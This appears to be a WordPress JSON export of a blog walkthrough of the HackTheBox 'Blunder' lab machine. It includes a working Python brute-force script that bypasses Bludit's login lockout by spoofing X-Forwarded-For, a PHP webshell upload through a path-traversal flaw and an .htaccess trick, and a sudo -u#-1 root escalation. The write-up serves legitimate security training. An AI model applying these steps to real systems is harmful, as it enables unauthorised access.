{"id":277,"date":"2020-06-08T16:18:50","date_gmt":"2020-06-08T16:18:50","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=277"},"modified":"2020-10-18T06:14:31","modified_gmt":"2020-10-18T06:14:31","slug":"blunder-hackthebox-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/blunder-hackthebox-walkthrough\/","title":{"rendered":"Blunder: Hackthebox Walkthrough"},"content":{"rendered":"\n<p>Hey all! In this blog post, we\u2019ll be walking through blunder from hackthebox. Blunder is an easy level linux machine. &nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Summary<\/h2>\n\n\n\n<p>The initial foothold on the box requires a bit of enumeration to find out the correct user who can login into CMS:- bludit. There is the file upload vulnerability on the cms that gets the initial shell on the box. With enumeration, we need to find the password for the user on he box. Privilege escalation to root is pretty simple as we just need to identify the privileges granted to the user.<\/p>\n\n\n\n<p>With all that said, lets get started.<\/p>\n\n\n\n<p>Starting with the namp scan, I found port 80 to be open, whereas port 21 (ftp) was filtered. So its of no use.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># nmap -sC -sV -oA blunder.nmap 10.10.10.191<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/LvxCNj8_Nh1vPph6VOadwDYxOfit3apRAdiypSoUlvtSTZ-gbWmlIG6ZApOdHZoorOBxTbrpoIsohYqA63QHYUsD9iJNJCb7xjENcULX6gDcxBrAMzXmn8PuNvuc2NGGCShVEglK\" alt=\"\"\/><\/figure>\n\n\n\n<p>Next, I went to <a href=\"http:\/\/10.10.10.191\">http:\/\/10.10.10.191<\/a> . A page landed.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/oDoYNAPToWrm9rjqkiCYk7lTVtLNU0mIh31H8Z4xBRPpLCv4sFeruSLYbuVG_GwCCdx1Tzu7DPDWrr_JnX3dWnVDa4wIqLuQ5XLSuzUJIz59ty0syvz6Skx_LOdVa3vUTzrJxSZS\" alt=\"\"\/><\/figure>\n\n\n\n<p>Cool! Scrolling through the contents, I found out that is is kind of a blog page.<\/p>\n\n\n\n<p>About page was much like a riddle<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/z6yYzz5vByle7qwc_xRjS8iIDVM7QIwTTYUajmkwYCqhf_KHal7tZi8U3jilVcY_B8haYkxd1tjj1t8EWEARG3t2n7BKBjjNaxIMujZOww6DohzN9YfJ5x096hvnYaZeCNs_WTDi\" alt=\"\"\/><\/figure>\n\n\n\n<p>I spawned a gobuster scan on the host<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># gobuster dir --url&nbsp; http:\/\/10.10.10.191 &nbsp; -t 50&nbsp; -w \/usr\/share\/seclists\/Discovery\/Web-Content\/big.txt -o gobuster.out<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/6c-GNbxGwh1cpO0IM11W0QoQAC7xapFq8pvbc3qaNWZwlhKNmRTdWt2o4D2E9RpVvmS_kBkoaV2Vanx-BRX_vCcU589pbW5GHSAla580HZcHKes6v3vIKyn015luDeDYJmoDMi1i\" alt=\"\"\/><\/figure>\n\n\n\n<p>Looking at the output, \/admin seemed interesting, so i jumped right into the <a href=\"http:\/\/10.10.10.191\/admin\">http:\/\/10.10.10.191\/admin<\/a> and there was a <strong>login page<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/8XbJ-Im2D2jH66xZgNW1sTwr5zT_pVfSAkG8uoWF-pBv_OWja0H8rwZ2gT0uwoWwteyBftyYmw-lLwrXw082ZvkVgH2ksdxm0ifyiC8s8IWsV99PtmEFRetZSYi3kqWm1er2JP9m\" alt=\"\"\/><\/figure>\n\n\n\n<p>The title mentioned bludit so i googled for it. It turned out to be the CMS. I searched for any exploits for the cms<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/XoGFkeAYq2jKEHokWYacjCaOP1uDmV-QmmhxftiKiIIncKUmdS5yP6XNE5C2KR3Exm0ulOkAKy9ZOWT47JBuF6MdsVsuqLU27POLYK6RJdYo0X21_uce9Zl62lYaCjHICxKczY9Z\" alt=\"\"\/><\/figure>\n\n\n\n<p>These 2 were authenticated attacks, so not of any use now. Googling for bludit exploits took me here (<a href=\"https:\/\/github.com\/bludit\/bludit\/pull\/1090\">https:\/\/github.com\/bludit\/bludit\/pull\/1090<\/a>) . It was basically bruteforcing the password for the user. The version affected was 3.9.2 so I tried to check the version of bludit installed on the box.<\/p>\n\n\n\n<p>On google.com search bludit github and the directory structure will open. From there, one can understand what all directories might be present for the cms.&nbsp;<\/p>\n\n\n\n<p style=\"background-color:#fcf0ed\" class=\"has-text-color has-background has-vivid-red-color\">Its a good practice to seach for the github repo of any cms to check for useful directories and files.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/R1KD0MWkPqiJElYMg4JNPX59-BBIdr8utuci_CcY2Ff7FSNvY6CHBcuHlddh3os9_fUkzKwuU_KIJ92_a29MMxizOnGKIPZ-HRWw8ZdX7C9i7aQdix32jCDX5RE91xKwucDeWXDW\" alt=\"\"\/><\/figure>\n\n\n\n<p>I found the version of bludit inside<strong> \/bl-themes\/blogx\/metadata.json<\/strong>. And its was <strong>3.9.2<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/VL_cArz-K4RK_DueRgLo-Iz2rvNkjY7un4_fehCc0BJiZHVWLe3hgVlRjfR27P6LVcZtKBGRtI7hdbHyUhs2cU4vjX6iWutkLVTDK0JKCe8SHqukW3DgUy16CD-J_nTWooRhJRy9\" alt=\"\"\/><\/figure>\n\n\n\n<p>But the prob now is, we dont know the user. Writing admin would be a lame guess. Maybe, I was missing out some directories\/files that were not visible in the gobuster out.<\/p>\n\n\n\n<p>So this time, i ran gobuster with some extension flags (  php and txt ) and used <strong>seclists-common.txt <\/strong>as the wordlist.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># gobuster dir --url&nbsp; http:\/\/10.10.10.191\/ -t 50&nbsp; -w \/usr\/share\/seclists\/Discovery\/Web-Content\/common.txt -o gobuster_dir1.out -x php,txt -s 200,204,401,403<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/sQ6uditNw5mZ_sh_rtzbj15Mjpxf428-sPEJ-sxhB8uDN9Umtsoyi5ije5fsKGhJhq3evw-ZwJVfETyPj0IbUcVgh2yotUGnoLp1OS2fC-YKP6F2y61CDQhj7wKoDbhhb2617fn8\" alt=\"\"\/><\/figure>\n\n\n\n<p>When i listed the contents of todo.txt, it unveiled the user to be <strong>fergus<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/WrsMTxapz0gRyGDumZiWbpT944g7CeI9BWjznCU7gNcGxaTFU9_NbFssE5GmxXmuvtYlL2vpXWmrQogjReNXJ-tCxW9XB-4rQg6EUK-b-fwPsx5Dt1kQnzZqyzj4mg0SS4XLF2vo\" alt=\"\"\/><\/figure>\n\n\n\n<p>I modified the script to add the wordlist of my choice<\/p>\n\n\n\n<pre class=\"wp-block-code scroll wpf-blue-background\"><code>!\/usr\/bin\/env python3\nimport re\nimport requests\n\nhost = 'http:\/\/10.10.10.191'\nlogin_url = host + '\/admin\/login.php'\nusername = 'fergus'\nwordlist = &#91;]\ndef file_read(fname):\n    \twith open(fname) as f:\n            \t#Content_list is the list that contains the read lines.\t \n            \tfor line in f:\n                    \twordlist.append(line.strip())   \n            \tprint(wordlist)\nfile_read('password_index.txt')\n# Add the correct password to the end of the list\nwordlist.append('adminadmin')\n\nfor password in wordlist:\n\tsession = requests.Session()\n\tlogin_page = session.get(login_url)\n\tcsrf_token = re.search('input.+?name=\"tokenCSRF\".+?value=\"(.+?)\"', login_page.text).group(1)\n\n\tprint('&#91;*] Trying: {p}'.format(p = password))\n\n\theaders = {\n    \t'X-Forwarded-For': password,\n    \t'User-Agent': 'Mozilla\/5.0 (X11; Linux x86_64; rv:76.0) Gecko\/20100101 Firefox\/76.0',\n    \t'Referer': login_url\n\t}\n\n\tdata = {\n    \t'tokenCSRF': csrf_token,\n    \t'username': username,\n    \t'password': password,\n    \t'save': ''\n\t}\n\n\tlogin_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)\n\n\tif 'location' in login_result.headers:\n    \tif '\/admin\/dashboard' in login_result.headers&#91;'location']:\n        \tprint()\n        \tprint('SUCCESS: Password found!')\n        \tprint('Use {u}:{p} to login.'.format(u = username, p = password))\n        \tprint()\n        \tbreak\n<\/code><\/pre>\n\n\n\n<p>I used a lots of wordlist to brute-force the password, but none of them worked. Finally i created a wordlist out of content of the website. It can be done using cewl.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># cewl http:\/\/10.10.10.191\/ -w password_index.txt<br>\n# python exploit.py<\/pre>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/65aEKni5IgyihQ7ETERhjfGwhNVRMKjeMUG29Yan30_MfkxG4OptRFhVcR05v4nmw7d77cZJRIxPmpLKTI6oHeb0GIWUUyJf44MIBVShRg3jLVRjuBSctealOiZY5vza5voOChJQ\" alt=\"\"\/><\/figure>\n\n\n\n<p>And it worked revealing the password to be <strong>RolandDeschain<\/strong>.<\/p>\n\n\n\n<p>I quickly logged in to the CMS with the credentials.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/xUlKVrYmxwFRdPYvvjeoz-SiOlVlYutjEnI-IT-FN334T5r-x34SOAugojja5iUO1DE_YqDQaMgvYndTUbSgM5RQVbihcP1gWZQFXxUssoihrLeMRC4daaa7NhL8YPmPZ_uyl7Rh\" alt=\"\"\/><\/figure>\n\n\n\n<p>There was a section to add new-content.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/gwdUAKNpnmZnAJ3Ll8PPAx1iJjHPIxuokEo9pCV0IKadksnr4sJFrtt4Lb8ki5iAoz28Xx6WLLgKcR3VnMcBzy-sVJ6OzQd-FDXPWXnOZRJVIGiOLwedJsYFSxD3UHRQdQL1LBL1\" alt=\"\"\/><\/figure>\n\n\n\n<p>This is the place where we found the image upload vulnerability in the searchsploit. The issue is describe here (<a href=\"https:\/\/github.com\/bludit\/bludit\/issues\/1081\">https:\/\/github.com\/bludit\/bludit\/issues\/1081<\/a>)&nbsp;<\/p>\n\n\n\n<p>The contents of the image is changed to php webshell. <strong>GIF89a <\/strong>at the bebeginning will dupe the server to believe it to be a gif file. Also, the exploit uses tempering the uuid&nbsp; parameter to <strong>..\/..\/tmp\/temp<\/strong>. So our malicious file will be stored in<strong> \/tmp\/temp <\/strong>directory.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/tXSGv3eTbsANZ5YzV8qb817BHXnyDhe3gqvW3xdlGuPHJtdyFa6e3xq9wxaIgeEvI7waEe86zhFhPPN6sitagJABrAbUoF8vqXvHykgv8d1vjcsFvbCQdwoeyeW_VPk2GFce3DFg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Also, a crafted <strong>.htaccess <\/strong>file has to be uploaded. Using<a href=\"http:\/\/httpd.apache.org\/docs\/1.3\/mod\/mod_mime.html#addtype\"> AddType<\/a> in your .htaccess file, one can add many other extensions from which PHP can be ran. In a nutshell, we\u2019re using .htaccess so that the image.jpg could be converted to image.php ( the file will now execute commands).&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/_8xSK3PhiJWqbOBSfj8dSTnnqJuVdTFvDvmD5rW8ksV0_kE29p9VxMjRupQ8FV90rQsU49Ml4RG0b0BOL6k8z7HSawwEHgQpxX2S7-rWXHkhz5CNKWqow56yxmvVFo6c4qzxvOS0\" alt=\"\"\/><\/figure>\n\n\n\n<p>Now that the .htaccess is uploaded, shell.php can be accessed in <a href=\"http:\/\/10.10.10.191\/bl-content\/tmp\/shell.php\">http:\/\/10.10.10.191\/bl-content\/tmp\/shell.php<\/a> .(even if the extension of shell is .jpg, the exploit is gonna work.) I grabbed a simple one-liner reverse shell from <a href=\"http:\/\/pentestmonkey.net\/cheat-sheet\/shells\/reverse-shell-cheat-sheet\">pentest monkey<\/a> and spawned a listener on the local box.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/Jm-oRnI8PefCrUO7ZtRkNnTsUKmv6E-JOD5Fwg7XSXIVLY07bgQCNcTuM4UeWDt67DBjPBIlL8n-opM4Z7M4uQ3Q9qPTb_UJCk-6txtqunLCjs63DW_nqn5zIcLn_4LnOgQURrNh\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/rA3vWx2lImLT6vN4ce1mtGw_Mrh_QpyYoulgE3dLlBcjoyjYi9olXnw1caFbizOXesdYH1F8LmW4D_jMsbwVHvaMyQ7zaXLVsYY99G-DG93zY5mQMV_m1v4ez7wg41GRt4LtwnEG\" alt=\"\"\/><\/figure>\n\n\n\n<p>And got the initial foothold.<\/p>\n\n\n\n<p>Getting the user.txt<\/p>\n\n\n\n<p>I started to enumerate with linpeas.sh but found nothing interesting. There were 2 users on the box <strong>hugo <\/strong>and<strong> shaun<\/strong> with hugo having the user.txt.<\/p>\n\n\n\n<p>Then i started manual enumeration and came across \/var\/www. There were 2 versions of bludit present. On digging, I found out the <strong>sha1 password hash<\/strong> for hugo.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/rczDn19YmuQzz3PGV5sBXWhMRzuHW20vVE-5pPZOiota_Zf7BkF3AftPQ2BausiMNEUJTm6h6mLYpnWrvf_D0vbFKR4r7U57bIU9YRXeef7Fwl-o720Prdzv2yyLoeQCECJug538\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/kMWHZgAClveWArKgoXphv623VK3gZHxSHI63G5YixjTyVr8aeVegTLRFHxNVRB36azLS-oKIdYkALTdmUtwypxHzFJQAExk09Stns_UUn1tYnQgrIS-lZGinpjsIwUpyQYG6-uL5\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/OFOGaIYPQpc6zOY5YzjXsqsIIe-nVkkFPwDHvIMvwO6AGlgLgmqikMx6Yh1ksD7sCsbSI8_Cf3PTdsUC7WWIpXAU95S1eFMJClfXiqDZqeIi2FKczUdM0RSsaR5U0nbO3hB4hLya\" alt=\"\"\/><\/figure>\n\n\n\n<p>I went to an online decrypter <a href=\"https:\/\/md5decrypt.net\/en\/\">https:\/\/md5decrypt.net\/en\/<\/a> to crack the hash.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/x3PutupkKAn83DFnSTCb4ZiHfV7iMUQKSqjyCB5JgzWy_0OszJbBCJQxQwzZ6eFnHi3k1D8dhIkyUVqswdOXbOOudbc2lKmOeZ9jdBXc5FGyGvRJtFznKO_pNE6BCnL4vHYOWCwX\" alt=\"\"\/><\/figure>\n\n\n\n<p>Since now i had the password to be <strong>Password120<\/strong>, I did <strong>su &#8211; hogo<\/strong> on the box.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/yIUZVj9sp1cI_S-j7ExsDRRP6A6lwNFgljecmSHMAI-mfY1eIFqjGliKgX_bNhwNI8QIh8jF0lqiOQAYeWT2QJTF-PTZxk3oX9qklwfIQ_aBLi0KmJ40bGoYcThxzO9QLMZ1fS3s\" alt=\"\"\/><\/figure>\n\n\n\n<p>I am <strong>hugo <\/strong>now. The user.txt can be grabbed now.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/xKixPYz_0luriyV26nvYDHUkx5xzbtk7QFqdMPfOue4O5L4ufMb0oUvQY08yxRRnzqfXeAbmLrT5x203NyrXPq7sFXSh6MeG2WmRdb15hXsHPMAVl_QF0RpyCbLbVYQUxuwnSNC1\" alt=\"\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Privilege escalation to root!!!<\/h2>\n\n\n\n<p>Upon initial enumeration, I found that sudo is present on the box. So I quickly ran <strong>sudo -l<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/lCfK7awwlKDcdWxAkh1gDFjgFdgn49THdcwDI39K7Fy2mgv96oyqTxivFhD1F_VTuP73g7zBH8HtirlHRscmCFJmhnPV5fiNjSmZMJSDD-LgN-hXQlW4gc2z0iklA--CTtclnRbv\" alt=\"\"\/><\/figure>\n\n\n\n<p>Hugo can run \/bin\/bash but not as root! I search the exact string on google and landed up on an exploit <a href=\"https:\/\/www.exploit-db.com\/exploits\/47502\">https:\/\/www.exploit-db.com\/exploits\/47502<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Exploit description<\/h3>\n\n\n\n<p>Sudo doesn&#8217;t check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv<br> -u#-1 returns as 0 which is root&#8217;s id<br> and \/bin\/bash is executed with root permission<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/ivxhppp6pl54Y-KtsMOcbXSBrrXEMZvoa8ybdCwUuHh5KHnOLvABO4dmGAusH9p3B6b6ncKKfwF5tH1dYeN1_vDTcNBrENLl_kc7avtbZa57hfCa5EgCPi-aLO2dpJ1jVoRcpaBR\" alt=\"\"\/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">Got root!!<\/h4>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/O8ZmtfXxsot8bLZ7bOi-vVav7nF-WWvvwepRtQwnv7OELdlL3QLtSde66VAai2gJfFMSD-v_Q7jisJWPIgnFLHerjmu_4LKLAC-hcpimyr-6sk_7gSZzPBokV4eMg8wFy8qfT1n_\" alt=\"\"\/><\/figure>\n\n\n\n<p>Thats all for the blog post!! Thanks for reading! For more such content visit <a href=\"https:\/\/shreyapohekar.com\/blogs\">here<\/a><br>\nSee you in the next post. Until then, happy hunting!!<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hey all! In this blog post, we\u2019ll be walking through blunder from hackthebox. Blunder is an easy level linux machine. &nbsp; Summary The initial foothold on the box requires a bit of enumeration to find out the correct user who can login into CMS:- bludit. There is the file upload vulnerability on the cms that [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":280,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2,141],"tags":[135,136,137,138,54,134,71,140,139,41,98],"class_list":["post-277","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","category-linux","tag-bludit","tag-cms","tag-enumeration","tag-gobuster","tag-htb","tag-htb-blunder","tag-linux","tag-pentesting","tag-readteam","tag-shell-upload","tag-sudo","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/277"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=277"}],"version-history":[{"count":5,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/277\/revisions"}],"predecessor-version":[{"id":523,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/277\/revisions\/523"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/280"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=277"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}